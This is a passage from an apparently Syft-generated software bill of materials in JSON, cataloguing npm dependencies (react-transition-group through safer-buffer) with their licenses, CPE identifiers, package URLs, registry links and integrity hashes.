*","source":"syft-generated"}],"purl":"pkg:npm/react-transition-group@4.4.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz","integrity":"sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==","dependencies":{"@babel/runtime":"^7.5.5","dom-helpers":"^5.0.1","loose-envify":"^1.4.0","prop-types":"^15.6.2"}}},{"id":"5f64d7de79050a02","name":"read-cache","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/read-cache@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz","integrity":"sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==","dependencies":{"pify":"^2.3.0"}}},{"id":"deca1a198ab80d23","name":"readable-stream","version":"2.3.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/readable-stream@2.3.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz","integrity":"sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==","dependencies":{"core-util-is":"~1.0.0","inherits":"~2.0.3","isarray":"~1.0.0","process-nextick-args":"~2.0.0","safe-buffer":"~5.1.1","string_decoder":"~1.1.1","util-deprecate":"~1.0.1"}}},{"id":"066e44c97461677f","name":"readable-stream","version":"3.6.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/readable-stream@3.6.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz","integrity":"sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==","dependencies":{"inherits":"^2.0.3","string_decoder":"^1.1.1","util-deprecate":"^1.0.1"}}},{"id":"beb5f9a5d33de00e","name":"readdirp","version":"3.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/readdirp@3.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz","integrity":"sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==","dependencies":{"picomatch":"^2.2.1"}}},{"id":"98e64f0b2bbef0ce","name":"recharts","version":"2.15.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/recharts@2.15.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz","integrity":"sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw==","dependencies":{"clsx":"^2.0.0","eventemitter3":"^4.0.1","lodash":"^4.17.21","react-is":"^18.3.1","react-smooth":"^4.0.4","recharts-scale":"^0.4.4","tiny-invariant":"^1.3.1","victory-vendor":"^36.6.8"}}},{"id":"b982e93a08325fbd","name":"recharts-scale","version":"0.4.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/recharts-scale@0.4.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz","integrity":"sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w==","dependencies":{"decimal.js-light":"^2.4.1"}}},{"id":"c6c6f81fb8ed6f43","name":"redis-errors","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/redis-errors@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz","integrity":"sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w==","dependencies":null}},{"id":"d5b8e01dbe4fdde4","name":"redis-parser","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/redis-parser@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz","integrity":"sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A==","dependencies":{"redis-errors":"^1.0.0"}}},{"id":"784a87ea0f6f2516","name":"rentaldrivego","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/rentaldrivego@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":null}},{"id":"ae03eb850b2a6844","name":"require-directory","version":"2.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/require-directory@2.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz","integrity":"sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==","dependencies":null}},{"id":"f7f7aa302949d36c","name":"require-from-string","version":"2.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/require-from-string@2.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz","integrity":"sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==","dependencies":null}},{"id":"791f53dc42a97604","name":"require-main-filename","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/require-main-filename@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz","integrity":"sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==","dependencies":null}},{"id":"c52cdc280efaa4d0","name":"resend","version":"3.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/resend@3.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/resend/-/resend-3.5.0.tgz","integrity":"sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ==","dependencies":{"@react-email/render":"0.0.16"}}},{"id":"2e445c7ed78482c1","name":"resolve","version":"1.22.12","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/resolve@1.22.12","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz","integrity":"sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA==","dependencies":{"es-errors":"^1.3.0","is-core-module":"^2.16.1","path-parse":"^1.0.7","supports-preserve-symlinks-flag":"^1.0.0"}}},{"id":"05272d1e7e2ad4be","name":"restructure","version":"3.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/restructure@3.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz","integrity":"sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw==","dependencies":null}},{"id":"b8be0fab008ab183","name":"retry","version":"0.13.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/retry@0.13.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/retry/-/retry-0.13.1.tgz","integrity":"sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==","dependencies":null}},{"id":"672814322994feff","name":"retry-request","version":"7.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/retry-request@7.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz","integrity":"sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==","dependencies":{"@types/request":"^2.48.8","extend":"^3.0.2","teeny-request":"^9.0.0"}}},{"id":"456353a253e18966","name":"reusify","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/reusify@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz","integrity":"sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==","dependencies":null}},{"id":"ca5a4d8be889885f","name":"run-parallel","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/run-parallel@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz","integrity":"sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==","dependencies":{"queue-microtask":"^1.2.2"}}},{"id":"36d9a8484ed180a6","name":"safe-buffer","version":"5.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/safe-buffer@5.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz","integrity":"sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==","dependencies":null}},{"id":"28135efb01cb74b9","name":"safe-buffer","version":"5.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/safe-buffer@5.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz","integrity":"sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==","dependencies":null}},{"id":"bc8acb243e9d9464","name":"safer-buffer","version":"2.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/safer-buffer@2.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/safer-buffer/-/safe